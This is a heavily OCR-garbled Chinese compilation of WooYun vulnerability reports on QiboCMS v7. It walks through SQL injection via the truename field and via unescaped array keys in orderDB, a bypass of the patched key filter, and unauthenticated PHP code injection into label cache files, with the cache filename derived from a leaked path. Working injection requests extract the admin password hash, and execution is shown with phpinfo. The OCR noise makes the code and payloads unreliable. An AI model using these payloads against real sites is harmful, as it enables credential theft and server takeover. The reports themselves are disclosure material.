这 个 和 之 前 discuz7.2 的 faq.php 那 个 注入 类 似 : http://**.**.**.**/bugs/wooyun-2014- 
066095 


所 以 ， 完 美 构造 了 一 个 SQL 注 入 。 


漏洞 证 明 


先 注 册 一 个 用 户 : 


论 PHP 常见 漏洞 


通行 证 | KS: 密码 : 登录 | 注册 | 登录 AES 2014 年 10 月 19 日 星期 日 11:48 下 午 设 为 首页 JE 


Qiboyof Team 07.0 RAE RD) ie 

















e | 全 站 搜索 | L-T | 高 级 搜索 


热门 搜索 : 齐 博 cWS 注册 域名 CEO 源码 下 载 IT 资讯 主机 空间 建站 手册 论坛 程序 健康 咨询 


D 欢迎 注册 


重要 信息 WHA) 
帐号 : test BSR, 此 帐号 可 以 使 用 ! 
邮箱 : 123@qq com 恭喜 你 , 此 邮箱 可 以 使 用 ! 
p MM Z2 a 恭喜 你 , 此 密码 可 以 使 用 ! 
重复 输入 密码 : DTI 
其 它 信息 呵 不 填 ) 
生日 : "| 年 [| vw 月 | "ja 
性 别 : ORBOBOR 
QQ: 
MSN: 









































记 下 自己 的 uid， 以 便 一 会 更 新 数据 : 





€ @ localhost/gibov7/member/homepage phepuid=2 | uid 为 2 , 先 记 下 U v e 


首页 Wm BE | 下载 M md 


test 的 个 人 主页 








今日 导读 : 中 国 移动 抢 跑 3G6 TPP “Bia” FS 


会 员 信 息 be 发 站 


ii 


帐号 : test 
Ral: 普通 会 员 


可 以 先 测试 一 下 是 否 存 在 注入 : 


UH 








ell&-mr-cwee Plea f* & LE 











€ | & localhost/aibov/member/userinfo.php?job-edit&istep-2 








INT v| = @ SQL- XSS- Encryption- Encoding: Other- 

4j Load URL  http;//localhost/qibov7/member/userinfo.php?job- edit&step-2 

$ Split URL E 
(© Execute | %0000 会 被 addslashes 转 换 成 000 

V] Enable Post data Enable Referrer 
Post data truename=1000}%00008 





























Btemail=123@qq.com&provinceid=| ie 





数据 库 连接 出 错 :UPDATE qb_memberdata SET - 5 ^ 
"email" -'1238qq.com',' icon' -",' sex” ="," bday' =", introduce" -",' oicq' =", msn' =", homepage’ =", address” -",' postalcode' -"," mobphone' =", telephone' =", idcard' =", truename'" 4»xxxV | provinceid' =",~ 
WHERE username-'test" 





You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test" at line 1 V Y 
ut your SQL syni sp ioe oe, m 转 勾 了 一 个 ， 使 SQL 语句 报错 了 


报错 了 ， 说 明 注入 是 存在 的 。 


简单 构造 一 下 ， 向 http://localhost/qibov7/member/userinfo.php?job=edit&step=2 发 
送 数据 包 : 


WooYun-2014-80259 : 齐 博 整 站 /地 方 门 户 SQL 注 入 漏洞 138 


truename=xxxx%0000&Limitword[000]=&email=123@...&provinceid=,address= 


(select user()) where uid=38%23 


< Ð localhost/qibov7/member/userinfo.php?job=edit&step=2 


INT y| =  SQL- XSS- Encryptiony Encoding- Other- 
xm) Load URL _shttp://localhost/qibov7/member/userinfo.php?job=edit&step=2 
Q Split URL 


» Execute 








[7] Enable Post data Enable Referrer 











Post data 


truename=xxxx960000\&Limitword[000]=&email=123 @qq.com&provinceid=,address=(select user()) where uid- 29623 


将 address 注 入 成 为 user()。Where 后 面 加 上 Uid=2， 防 止 把 其 他 人 的 address 也 注入 


了 o 


查看 个 人 注入 的 地 址 ， 即 可 见 注入 获得 的 结果 : 


localhost/aibov7/member/homepage.php?uid-2 g ER e 加 - BE <Ctrl+h 
空间 计算 方式 : 系统 默认 容量 + 用 户 组 默认 容量 + 自身 容量 - 已 用 空间 = 可 用 空间 大 小 "AR 
= 阿飞 
"Ae 
个 人 基本 信息 个 人 动态 信息 
性 别 : 保密 生日 : 0000-00-00 最 后 登录 时 间 : 2014-10-19 23:50:52 
所 在 城市 : QQ: 最 后 登录 IP 所 在 地 : IP 库 不 存在 , 请 点 击 下 载 一 个 ! 
联系 MSH: 主页 被 访问 数 : 1 
个 人 网站: 主页 最 近 被 访问 日 期 : 2014-10-19 23:49 
注册 日 期 : 2014-10-19 23:48:55 
自我 介绍 : 
我 的 私密 资料 
注册 IP: 127.0.0.1 最 后 登录 IF : IP 库 不 存在 , 请 点 击 下 载 一 个 ! 邮政 编码 : 
真实 姓名 : xxxx\’, provinceid = ”身份 证 号 码 : 联系 手机 : 


联系 电话 : 联系 地 址 ; root@locelhost | 刚才 把 注入 获得 的 数据 放 在 联系 地 址 里 了 


RAR: 以 上 私密 资料 只 有 本 人 与 管理 员 才 可 查看 , 其 它 人 无 法 查看 ! 


我 的 热门 文章 


发 布 文章 


这 个 洞 是 通 杀 齐 博 所 有 系统 的 ， 经 测试 齐 博 整 站 系统 、 齐 博 地 方 门 户 都 可 以 中 招 ， 


没 试 其 他 一 些 系统 了 ， 我 估计 很 多 都 得 中 招 。 


E 


4A — = 
修复 方案 


过 滤 ， 转 义 。 


WooYun-2014-69746 : qibocms V7 整 站 系统 最 新 
版 SQL 注入 一 枚 有 另外 一 处 能 引入 转 义 符 的 地 方 。 


X 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-069746 
简要 描述 
好 久 没 看 过 qibo 的 了 。 高 三 累 成 狗 , 补课 生活 终于 快要 结束 了 。 
详细 说 明 
首先 来 看 一 下 全 局 文件 


$ POST-Add S($ POST); 
$ GET-Add S($ GET); 


$ COOKIE-Add S($ COOKIE); 


function Add_S($array) { 
foreach($array as $key=>$value) { 

if(!is_array($value) ) { 
$value=str_replace("&#x","& # x", $value); // iE — 2 
$value-preg replace("/eval/i","eva 1",$value); //3à 
!get magic quotes gpc() && $value-addslashes($value); 
$array [$key]-$value; 

jelse( 


$array[$key]-Add S(S$array[S$key]); 


J 
return $array; 
[a E] 


看 这 函数 对 数组 中 的 value 进 行 了 addslashes 没有 对 数组 中 的 key 进 行 addslashes。 





在 memberpost.php 中 
if($lfjid) 
{ 
if ($web_admin| | $1fjuid==$rsdb[uid] ){ 


$atc power-1; 


这 里 判断 了 一 下 权限 如 果 是 管理 员 的 话 就 让 这 变量 为 1 当然 我 们 是 注册 不 到 管理 员 
的 


看 后 面 的 如 果 你 的 id 是 和 这 个 发 布 文章 的 id 是 一 样 的 那么 这 个 变量 也 会 成 1 
也 是 有 权限 的 所 以 。。 


elseif($job--'manage') 
{ 
if(!$atc_power )showerr ("48% ZR"); 
if ($rsdb[pages ]<2){ 
header ("location: post .php?job=edit&aid=$aid&mid=$mid&only=s 
j 
$erp-get id table($aid); 
if ($step==2) { 
asort(S$orderDB); 
$i-0; 
foreach( $orderDB AS $key=>$value) { 
$i++; 


$db->query ("UPDATE {$pre}reply$erp SET orderid=$i WHERE 





IE 
这 里 $orderDB 结合 qibo 的 伪 全 局 可 以 直接 控制 
然后 把 数组 中 的 key 直 接 带 入 到 了 查询 当中 结合 上 面 说 的 数组 中 的 key 不 会 被 转 义 


所 以 造成 了 注入 。 


0x02 能 引入 转 义 符 的 地 方 。 


linc/artic function.php 中 


/* 修 改 软件 */ 
function post_edit(){ 
global $db,$_pre, $postdb, $fid, $FidDB, $Fid_db, $lfjuid, $rsdb, $1f- 


if( $rsdb[levels]&&$postdb[levels] ) 





{ 
$postdb[levels]-$rsdb[levels]; // 处 理 其 他 级 别 2, 3,4... AE H 
} 
if($postdb[top]) 
OS _ E 
省 略 一 点 


if($rsdb[ keywords ] !=$postdb[ keywords ] ) { 
keyword_del($aid, $rsdb[ keywords] ); 


keyword_add($aid, $postdb[ keywords], $1fjdb[uid]); 


function keyword_del($aid, $keyword) { 
global $db,$_pre; 
if(!$keyword) { 
return ; 
j 
$detail2-explode(" ",$keyword); 
foreach( $detail2 AS $key=>$value) { 
if ($value) { 
$db->query("UPDATE ~{$_pre}keyword > SET num=num-1 WHERE 
$_rs=$db->get_one("SELECT * FROM ~{$ prejkeyword' WHERE 
$id=$_rs[id]; 


$db->query("DELETE FROM ^($ prejkeywordid' WHERE “id = 





keyword_del($aid,$rsdb[keywords]); 
这 里 进入 查询 的 时 候 是 用 的 是 出 库 来 的 所 以 能 引入 转 义 符 。 


漏洞 证 明 





首先 注册 一 个 会 员 
请 选择 一 个 栏目 投稿 

FID E BH ER 类 投稿 数量 管理 内 容 我 要 投稿 
1 【新 闻 中 心 】 大 分 类 

29 【产品 库 】 | 大 分 类 

9 【图 片 中 心 】 S 大 分 类 

10 |l- DS 5651 子 栏目 (1) 管理 发 表 
11 【下 载 中 心 】 大 分 类 

13 【影视 频道 】 大 分 类 

15 【商城 频道 】 大 分 类 

17 【FLasH 频 道 】 大 分 类 


然后 选择 一 个 栏目 投稿 。 





网 页 正在 跳 转 当 中 , 请 稍 候 - - - 


[发 表 新 主题 ] [ 续 发 本 主题 ] [返回 文章 列表 ] [查看 文章 ] [修改 文章 ] 


如 果 您 的 浏览 圳 没有 自动 跳 转 , 请 点 击 这 里 





发 布 成 功 后 因为 这 里 判断 了 


if ($rsdb[pages]<2) { 
header ("location: post .php?job=edit&aid=$aid&mid=$mid&only=s 
E R) 


就 是 说 页 数 不 能 只 有 一 页 所 以 我 们 得 点 [ 续 发 本 主题 ] 再 增加 一 页 。 


668、asd 2 美女 欣赏 2014-07-25 ”已 审 / 未 推荐 





两 页 了 。 
然后 这 里 可 以 直接 看 到 id 为 668. 


4) LoadURL http://web.com/gibov7/member/post.php?jab=manage&aid=668&mid=only=&step=2 
X Split URL + 


(de Execute ss) 


Post data orderDB[asd'and extractvalue(1, concat(OxSc, (select concat(username,password) from qb. members limit 1)))#]=x $ 
$ 


B 据 库 连接 出 错 :UPDATE qb reply SET orderid=1 WHERE aid-'668' AND rid=’ asd’ and extractvalue(1, concat(Ox5c, (select concat (username, password) 
om gb members limit 1)))# 





KPATH syntax error: ' Vadmin21232f29Tab5TabaT43894da0eda" 
1105 





修改 key 为 注入 语句 成 功 注入 。 


0x02 引入 转 义 符 
首先 注册 一 个 会 员 然后 发 布 一 个 文章 这 样 写 


nama M7 Fisk aS i < 





| | Ri 

















Wm | ”|[- 建 站 软件 - 
«- 
lw 
软件 [ax 禁用 评论 : 
名 


常用 关键 字 ~| 作为 相关 文章 的 索引 








E5) 
关键 字 这 样 写 发 完 后 然后 编辑 一 下 


ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ""a' V at line 1 
1064 数 据 库 连接 出 错 :SELECT * FROM qb download keyword WHERE keywords =" a’ V 





(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
ight syntax to use near ""a' V at line 1 
1064 





引入 了 转 义 符 成 功 报错 了 。 


修复 方案 
转 义 一 下 。 


foreach( $orderDB AS $key=>$value) { 
$i++; 
$key=addslashes($key); 
$db->query ("UPDATE {$pre}reply$erp SET orderid=$i WHERE 


} 
i — —g 





第 二 个 


$keyword=addslashes($keyword); 


WooYun-2014-70353 : qibocms 多 个 系统 绕 过 补 
丁 继 续 注 入 2 


Y 
— Qá 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-070353 


简要 描述 

之 前 发 了 补丁 被 绕 过 了 , 现在 又 发 布 了 补丁 。 今天 上 午 的 时 候 看 了 看 补丁 。 第 一 眼 
觉得 很 牛 逼 。 然后 觉得 这 补丁 很 吊 , 就 放下 了 “。 下 午 的 时 候 又 继续 看 了 看 补丁 原来 
还 是 可 以 绕 过 。 

依旧 是 通 杀 多 个 系统 。 

由 于 是 通用 的 函数 , 所 以 能 造成 注入 的 点 不 止 一 处 。 

用 V7 整 站 系统 再 随便 找 一 个 点 来 说 就 行 啦 。 


详细 说 明 
再 来 看 看 一 下 qibocms 的 全 局 过 滤 函 数 


$ POST-Add S($ POST); 
$ GET-Add S($ GET); 


$ COOKIE-Add S($ COOKIE); 


function Add_S($array) { 
foreach($array as $key=>$value) { 

if(!is array($value))( 
Qeregi("['NNN"&]-",$key) && die('ERROR KEY!'); 
$value=str_replace("&#x","& # x",$value); // i ik&—3À2 
$value-preg replace("/eval/i","eva 1",$value); //3i 
!get magic quotes gpc() && $value-addslashes($value); 
$array [$key]-$value; 

jelse( 


$array[$key]-Add S(S$array[S$key]); 


j 


return $array; 





这 里 把 数组 中 的 value addslashes 转 义 了 


但 是 没有 对 key addslashes (这 里 应 该 也 不 能 做 addslashes 因为 会 像 上 次 那样 绕 过 ) 
可 以 看 到 是 把 过 滤 key 的 代码 换 了 之 前 是 replace 可 以 绕 过 

现在 是 @eregi("['\"&]+", $key) && die((ERROR KEY); 

RAR, 看 起 来 很 呵 的 样子 。 匹配 到 ' 或 者 " 或 者 \ 就 直接 退出 。 

当 我 第 一 眼看 到 的 时 候 觉得 很 呆 就 放下 了 qibo。 睡觉 去 了 。 


到 了 下 午 精神 倍 棒 
依旧 我 们 自己 来 写 一 个 文件 测试 一 下 
再 调用 一 下 qibo 的 这 函数 


<?php 
$_GET=Add_S($_GET[a]); 
function Add S($array)( 
foreach($array as $key=>$value) { 
if(!is array($value))( 
@eregi("['\\\"&]+", $key) && die('ERROR KEY!'); 
$value=str_replace("&#x","& # x",$value); // 过 滤 一 些 > 
$value-preg replace("/eval/i","eva 1",$value); //ià 
!get magic quotes gpc() && $value-addslashes($value); 
$array [$key]-$value; 
jelse( 


$array[$key]-Add S(S$array[S$key]); 


j 


return $array; 





P< pnp -= 
$_GET=Add_S($_GET[a]); € Qi web.com/yu.php?a[a']=a 
访问 最 多 |) EasyTalk Administrato.. $% 90sec 信 息 安 4 


INT y = 6 SQL XSS- Encryption" Encodir 


function Add S($array)| 
foreach($array as $key=>$value) { 
if(lis array($value))| 
Geregi( [ XXV" &]*^, $key) && die C ERR 
j $value-str replace( &?x , & # x',$va 
$value-preg replace(" /eyal/i', “eva 1 


~ Load URL | web.com/yu.php?a[a']-a 
| Split URL 
A » Execute 
$arrav[$kev]l-$value; 


else 
$array[$key]-Add S($arrav[$key]); 


[E] Enable Post data | | Enable Refer 
: | ERROR KEY! 


return $array; 





384& key 中 的 单 引 号 被 匹配 到 了 被 退出 了 
但 是 换 一 种 方式 呢 这 里 我 输出 一 下 $key 





LJ 5 i pap 


$ GET-Add S($ GET[a]); 





function Add_S($array) { 
foreach($array as $key=>$value) { 

if (lis_array ($value)) { 

echo $key; 
@eregi( [' AV &]*^, $key) && dief ERROR KEY!’ 
$value=str_ ‘replace (’ kër, kh # x ^, $value) ; 
$value-preg. replace(^/eyal/i'. “eva l°, $value 
lget_magic_quotes_gpc() && $value-addslashes 
$array[$keyl-$value; 

]else 
$array[$key]-Add S($arrav[$key]) ; 


Ü Split URL 
^; Execute 














return $array; 


€ e Esos a[a ][asd]=a 


B 访问 最 多 ! EasyTalk Administrato... 
INT y = $ SQL XSS- Encryption" Encodinc 


Enable Post data 



















2 90sec 信 息 安 全 - 


web.com/yu.php?a[a'][asd[]-a 


Enable Referrer 


可 以 看 到 提交 ,../yu.php?a[a][asd]=a 的 时 候 那么 进入 过 滤 函 数 的 时 候 的 key 是 asd 


那么 就 不 会 被 匹配 到 就 不 会 被 过 滤 了 。 
么 我 们 不 就 是 绕 过 了 这 个 过 滤 了 ? 


绕 过 了 这 个 随便 找 个 点 来 说 
在 member/post.php 中 


WooYun-2014-70353 : qibocms 多 个 系统 绕 过 补丁 继续 注入 2 


elseif($job--'manage') 
{ 
if(!$atc_power )showerr ("IRAk"); 
if ($rsdb[pages ]<2){ 
header ("location: post .php?job=edit&aid=$aid&mid=$mid&only=s 
j 
$erp-get id table($aid); 
if ($step==2) { 


asort(S$orderDB); 


foreach( $orderDB AS $key=>$value) { 
$i++; 
$db->query ("UPDATE {$pre}reply$erp SET orderid=$i WHERE 


} 


refreshto("$FROMURL" , " ZE/ 527" 1); 


E — 
foreach 出 来 的 key 没 有 过 滤 直接 带 入 到 了 查询 当中 


UNI [6 | = @ SUL" ADS” Encryptiony tencogingy utiner* 
~@ Load URL  |http://web.com/gibov7/member/post.php?job- manage&aid- 666&mid- 100&only 2 &step - 2&orderDB[ad'[]- asd 
Split URL 


Execute 





|] Enable Post data [| | Enable Referrer 


ERROR KEY! 


直接 提交 key 被 匹配 出 像 刚才 那样 绕 过 一 下 





PHP 


Load URL | http://web. EGET php?job-manage&aid -6668mi Og&only-&step- Z&orderDB[yu' and extractvalue(1, concat(Dx5c, (select 7 


本 
9 Split URL concat(username,Ox2e,password) from qb. members limit 1) Jo23][asd]j= asd 
L 


Execute 

















Enable Post data Enable Referrer 
SOE EES UPDATE qb reply SET orderid-1 WHERE aid-'666' AND rid=’yu’ and extractvalue(1, concat(Ox5c, (select 
concat (username, Ox2e, password) from qb members limit 1)))# 














* Xadnin. 21232£297a57a5a743894a0ed’ 


ATH syntax error: 
105 








这 样 进行 检测 的 key 是 asd 但 是 带 入 查询 的 而 是 那 段 含 单 引号 的 key。 


` M - 

bj i= 

TR 辣 hE AF 

http://web.com/gibov7 {member /post.php?job=manage&aid =6668mid ep orderDB[yu' and extractvalue(1, concat(0x5c, (select : 





x Load URL 
b Split URL concat(username,Ox2e,password) from qb. members limit 1) 
^ Execute 

















Enable Post data Enable Referrer 

8 j A: ATE qb reply orderid- aid- rid-'yu' and extractvalue(1, concat(Ox5c, (select 
数据 库 连 接 出 错 :UFDATE qb reply SET orderid-1 WHERE aid-'666' AND rid-' d lue( (Ox5c, (sel 
concat (username, Ox2e, password) from qb members limit 1)))# 














Rae syntax error: ' \admin. 21232f297a57a5a749894a0ed’ 
1 


05 











| 








] 








WooYun-2014-70366 : qibocms 全 部 开源 系统 
Getshell 


Y 
—— I i 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-070366 


简要 描述 
多 研究 研究 了 会 发 现 可 以 Getshell。 
看 了 看 qibo 所 有 的 开源 系统 都 存在 这 洞 。 
无 需 登 录 Getshell。 
之 前 一 直 在 因为 不 能 直接 闭合 而 纠结 。 
找 P 神 指点 了 指点 MAA © 
用 整 站 系统 来 演示 一 下 把 。 


P.S. 狗 哥 能 否 送 我 个 邀请 码 /hx 


function Add_S($array) { 
foreach($array as $key=>$value) { 

if(!is array($value))( 
@eregi("['\\\"&]+", $key) && die('ERROR KEY!'); 
$value=str_replace("&#x","& # x",$value); // 过 滤 一 些 :7 
$value-preg replace("/eval/i","eva 1",$value); //ià 
!get magic quotes gpc() && $value-addslashes($value); 
$array [$key]-$value; 

jelse( 


$array[$key]-Add S(S$array[S$key]); 


j 


return $array; 





看 似 修复 得 很 完美 可 是 呢 。 


F< pnp = 
$_GET=ådd_S($_GET[a]); € Qi web.com/vu.php?a[a']-a 
function Add S($array)| ibis | | EasyTak Administrato.. $ 90sec 信 息 安 4 
DOG IGNI MEN INT y = 6 SQL XSS- Encryption" Encodir 
Geregi( [ XV &k]*^, $key) && dief ERR æ Load URL [web.com/yu.php?ala']=a 
3 $value=str_ replace &ix',^R d x pam " 
} $value=preg_repl acel’, feval/i > eva do Split URL 
| !get nagic quotes gpc() && pean ») Execute 
$array[$key]-$value; 2 == 
}elsef [7] Enable Post data ^ Enable Refern 
$array[$key]-Add S($array[$keyl); 
ERROR KEY! 


return $array; 


被 匹配 出 
当 像 下 图 这 样 提交 的 时 候 匹配 的 key 是 asd 那么 就 不 会 被 匹配 出 就 不 会 被 过 滤 。 


it PHP 常见 漏洞 


$ GET-Add S($ CET[a]) ; 








€ Q ij web.com/vu.php?a[a' ][asd]-a 
«P 


function Add S($array)| 

















Pe el ed 访问 最 多 |; EasyTalk Administrato... $ 90sec 信 息 安全 
if(lis array($value))1 INT y= 6 SQL XSS- Encryption” Encoding 
echo $key; zn 








&eregi( [' \\\"&]+", $key) && die( ERROR KEY!’ J loa 
$value-str replace( &tx^, & # x”, $value); g Split URL 
$value-preg replace( /eval/i’, “eva 1°, $value > 
lget magic quotes gpc() && $value=addslashes | " Execute 
lei I ae Enable Post data Enable Referrer 
else 
$array[$key]=Add_S($array[$key]); 


web.com/yu.php?a[a' ][asdl]=a 











asd 


return $array; 


在 label module.php 中 这 里 无 需 登 录 任 何 


WooYun-2014-70366 : qibocms 全 部 开源 系统 Getshell 155 


else 


{ 
foreach($label AS $key=>$value) 
{ 
var_dump ($value);exit; 
// 如 果 是 新 标签 时 ， 即 为 数组 array()， 要 清空 
if(is_array($value) ) 
{ 
$label[$key]=''; 
j 
j 
// 写 缓存 
if( (time()-filemtime($FileName))»($webdb[label cache time]*60: 
$_shows="<?php\r\n\$haveCache=1; \r\n"; 
foreach($label AS $key=>$value) { 
$value=addslashes($value) ; 
$_shows.="\$label[ '$key' ]=stripslashes('$value');\r\n", 
j 
write file($FileName,$ shows.'?»'); 
j 
j 





8 Tqibox 


foreach($_POST AS $ key-»$ value)( 


lereg("^\ [A-Z]*",$ key) && $$ key-$ POST[S$ key]; 
} 


foreach($ GET AS $ key=>$ value)( 


'ereg("^N [A-Z]*",$ key) && $$ key-$ GET[S$ key]; 


所 以 这 变量 $label 可 以 直接 控制 。 


大 后 循环 出 来 数组 中 的 key 和 value 都 直接 写 入 到 了 缓存 文件 中 。 


这 里 由 于 value 全 局 的 函数 会 受到 第 一 次 转 义 $value=addslashes($value); 


这 里 又 经 过 了 第 二 次 转 义 那么 就 是 aW 
"$label['$key']=stripslashes('$value');\nn" 
写 入 时 候 的 代码 就 看 有 个 stripslashes 其 实 是 不 会 被 执行 的 而 就 是 把 stripslashes 写 
入 到 文件 当中 。 
这 时 候 只 有 来 利用 key 由 于 在 全 局 的 过 滤 函 数 中 没 对 key 做 addslashes( 也 不 能 做 
addslashes) 所 以 不 会 被 转 义 而 且 结 合 上 面 的 就 直接 绕 过 了 。 
当 写 入 到 文件 中 的 时 候 是 这 样 的 。 


$haveCache=1 ; 








B 访问 最 多 || EasyTalk Administrato.. $% 90sec 信 息 实 全 小 姐 WM Exploit-DB 漏 洞 公布 | | EasyTalk Ac 
x INT vy = @ SQL XSS- Encryption». Encodingy Other- 
7 ~ Load URL | web.com/qibov7/index.phpelabel[asd]- asda' 
SQ split URL 
Wo Execute 
[E] Enable Post data | | Enable Referrer 
通行 证 | ES: xiaoyux TE: @eeeee | 登录 | 注册 | 登 
v http:/ /web. con/ qibov7 /do/sea 
a bxef-V httpn://web. con/aibovT/do/seal ate f£. D i 

ka Load URL | http://web.com/qibov7 index.phpelabel[asd'[- asda' 

Ü Splt URL 

^» Execute 


(| Enable Post data | | Enable Referrer 
ERROR KEY! 


key 中 直接 含 单 引号 被 匹配 到 然后 退出 了 。 


结合 上 面 的 方式 绕 过 


L — d -| 


ier 和 € Qi web.com/abov7 findex.pho?label[asd' ][asd ] ast QAE 
: |B 访问 最 多 © EasyTalk Admiristrato.. $ 90sec 信 息 安全 小 组 KB Exploit Dain? 
11 . INT v æ 9 SQL XSS* Encryption Encoding: Other- 
lA aa Load URL web, com/qibov7 index. p pelabel[asc! Tras] asda 
arch 2 Spit URL 
» Execute 


T | | Enable Post data | Enable Referrer 
i/qio 
Vqit 通行 证 | S: xiaoyux =: @eeeee 登录 





这 时 候 写 入 的 代码 为 Slabell'asd"]-stripslashes("); 

后 面 的 stripslashes(") 为 哈 是 空 的 了 呢 

如 果 不 是 空 的 还 能 利用 转 义 符 来 搞 。 

因为 我 们 这 样 提交 index.php?label[asd'][asd]=asda' 这 样 的 那么 他 的 value 是 数组 


if(is_array($value) ) 


{ 


$label[$key]=''; 


就 清空 了 。 
一 开始 我 一 直 在 纠结 如 果 闭 合 之 前 的 这 个 [ 我 就 需要 提交 一 个 yu 人 ## 类 似 这 样 的 
可 是 写 入 的 是 数组 中 的 key 如 果 要 在 key 中 写 入 ] 的 话 那么 就 成 了 
http://**.** ** **/aibov7/index.php?label[asd']][asd]-asda' 
3L 5 T [asd']] 这 样 那么 提交 的 ] 和 之 前 [ 闭合 然后 key 就 还 是 asd 

后 就 一 直 在 这 纠结 这 个 问题 。。 

后 面 问 了 问 P 神 尼 玛 瞬间 给 我 解决 。 
P 神 给 的 [a'."${phpinfo()}"."] 利用 双 引 号 的 二 次 解析 来 Getshell 

么 就 让 我 们 的 key 为 a'."${phpinfo())".' 这 个 就 行 了 KS] 


论 PHP 常见 漏洞 








<?php INI vy) = $ SQL- X557 Encryptiony Encodng: Uther- 
$haveCache- Load URL  [http: = "m - "Y: II 
flabell a "~${phpingo OT". ""JestripsTashes( 5) qm) Loa ttp://web.com/qibov7 findex.php?label[a'. " $4phpinfo()?"."][asd]- asda 
$1abel[ head _guides j= stripslashes( «dix split URL 

Xdiv class-X'ico guide post\ ><a href=" 

<div class-X'ico guide sell\” ><a href=\"| X) Execute 











<div class-V'ico guide jf ><a href=\"ht 
<div class-X'ico guide userX ><a href=" 
<div class=\"ico_ guide searchV ><a href: 
Xdiy class=\\"ico_guide book\*><a href=\" 
<div class-X'ico guide digg\”><a href=" 
$1abel[ head search J= BER PEDES <a bref=\" 
<a bref=\" http://web. con/gibovT/do/se 
fa ~ wh wah a 


测试 一 下 能 不 能 执行 


Enable Post data |] Enable Referrer 
通行 证 | 帐号 : xiaoyux zi. 000000 注册 | 

















Oibosoft .*com 





int Ali (Ase a AL" ADO% ETILTYPUUTI ETILUUTIU7” OUY 

十 LoadURL http://web.com/gibov7/cache/label cache/index 1 0 0 0 0 82e4a.phpl 5 
Q Split URL x 
» Execute 














[E] Enable Post data | | Enable Referrer 














Parse error: syntax error, unexpected ' ? in D:\ApmServ\www\ht docs\qibov7 \cache\label_cache 


竞 然 报错 了 ? 这 里 我 们 用 一 下 错误 抑制 符 
那么 也 就 是 a."[[email protected]()}"."] 提交 的 key 为 a'."[email protected]()}"." 


UI vje» Ẹ DYWLT A22" CTILTYPRUUTI” ETILUUITI virer 

三 LoadURL | http://web.com/qibov?findex.php?label[a’."${@phpinfo(}+}",'][asd]=asda' 
Ü Split URL 
^) Execute 











Enable Post data Enable Referrer 
行 证 | 帐号 : xiaoyux EH: 000000 注册 | 登录 AES 





Qibosoft, com 7.0% à 





4m| Load URL  |http:;//web.com/gibov7/cache/label cache/index 1 0 DO D O0 82e4a.php 
Q Spit URL 


^, Execute 





Enable Post data Enable Referrer 








成 功 执行 。 

后 面 我 再 简化 了 一 下 其 实 是 不 需要 用 到 双 引 号 的 二 次 解析 的 
[".phpinfo()."] 提交 的 key 为 .phpinfo(). 依旧 可 以 直接 执行 
之 前 的 思维 一 直 就 是 想 着 去 闭合 。 唉 。 
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内 容 可 以 搞定 了 这 里 我 们 再 来 看 一 下 文件 名 是 咋 来 的 
$FileName=ROOT_PATH."cache/label_cache/"; 
if(!is_dir($FileName) ) { 
makepath($FileName) ; 
} 


$FileName.=(ereg("\.php", basename($WEBURL) )?preg_replace("/\.pl 
‘ — 








首先 目录 cache/label_cache/ 
再 来 看 文件 名 


" intval($ch)." .intval($chpagetype)." .intval($chmodule)." intval(Schfia)." .intval($c 
ityid).".substr(md5(getTpl("index",$chdb[main_tpl])),0,5).".php" 


就 是 经 过 一 系列 的 转 整 除开 $ch 为 1 其 他 的 那些 变量 我 们 都 没 去 定义 那么 intval 后 
为 0 


来 看 一 下 这 个 getTpl("index",$chdb[main_tpl]) 

这 个 其 实 就 是 模版 地 址 网 站 的 绝对 路 径 + 默 认 模 版 地 址 

这 里 用 到 了 网 站 的 绝对 路 径 所 以 我 们 要 找 一 个 可 以 泄漏 绝对 路 径 的 。 
会 泄漏 绝对 路 径 的 地 方 很 多 我 随便 贴 两 处 把 
http://**.**.**.**/data/label hf.php 

http://**.** ** **//do/fontimg.php 

http://**.** ** **//hack/gather/inc/show system fid.php 

以 为 本 地 测试 为 例 


@ LoadURL  |http://web.com/aibov7/data/label hf.phpl 
Q Split URL 
» Execute 

回 Enable Post data | | Enable Referrer 


Fatal error: Call to undefined function En_TruePath() in D:\ApmServ\www\htdocs\qibov7 
\data\label_hf. php on line 3 


D:\ApmServ\www\htdocs\qibov7\data\label_hf.php 
AB Z pp ob 8326534 $842 3/177 D:\ApmServ\wwwihtdocs\qibov7 


论 PHP 常见 漏洞 


再 加 上 默认 模版 路 径 /template/defaultindex.htm 

那 就 是 D:\ApmServ\www\htdocs\qibov7/template/default/index.htm 

对 这 个 进行 nd5 一 次 得 到 82e4a1041f04d2edb779e87b37623786 

然后 他 这 里 是 substr(md5(getTpl("index",$chdb[main_tpl])),0,5) 取 前 5 位 

那么 就 是 82e4a 再 拼凑 起 来 
BA 





那么 就 得 到 cache/label cache/index 1 0 0 0 0 82e4a.php 
us Tp — ow A erp eeu? su aci 
|. Load URL | http://web.com/aibov7/cache/label cache/index 1 Q0 Q 0 0 82e4a.phpl 
Q Split URL 
>) Execute 











[E] Enable Post data [F] Enable Referrer 

















[System  [Vändows NT SLVYAZGOFSBIUDV 5.1 build 2600 
Build Date May 2 2008 18:01:20 


Configure cscript /nologo configure. js ^--enable-snapshot-build" ^--with-gd-shared^ 
Command *——with-extra-includes=C: \Program Files (x86) \Microsoft SDK\Include;C: \PROGRA 2 
\MICROS ~2\VC98\ATL\ INCLUDE ; C: \PROGRA~2\MICROS ™2\WC98\ INCLUDE ;C: \PROGRA 2\MICROS 2 
MAWCORTWECATNOCIDTIE^ -uri th-avtera-lihest* Prarram Bilas IVARAM ornon f+ KATR- re 
~ ~ ER 一 ~ 





在 Windows iis 下 可 以 利用 短文 件 名 来 猜 解 
4« Rwindows apache 的 话 那 就 更 简单 了 
i 4&cache/labelcache/index-1.php 








F- 
访问 最 多 ©) EasyTak Administrato.. $ 90sec 信 息 安 全 小 组 KI Exploit-DB 漏 洞 公布 (7 EasyTalk Administrato... BB) 1337Day £} 90sec 
INT y = $ SQL XSS- Encryptiony Encoding Other- 


|æ Load URL | 
Q Split URL 
JJ Execute 





€ Qi web.com/gibov7/cache/label_cache/index_~1,php RY 了 | 























Enable Post data Enable Referrer 
















System Windows NT SLVYAZGBFSBIUDY 5.1 build 2600 
Build Date May 2 2008 18:01:20 


cscript /nologo configure. js ^--enable-snapshot-build" “--with-gd=sha 
“——with-extra-includes=C: \Program Files (x86) \Microsoft SDK\Include;C 
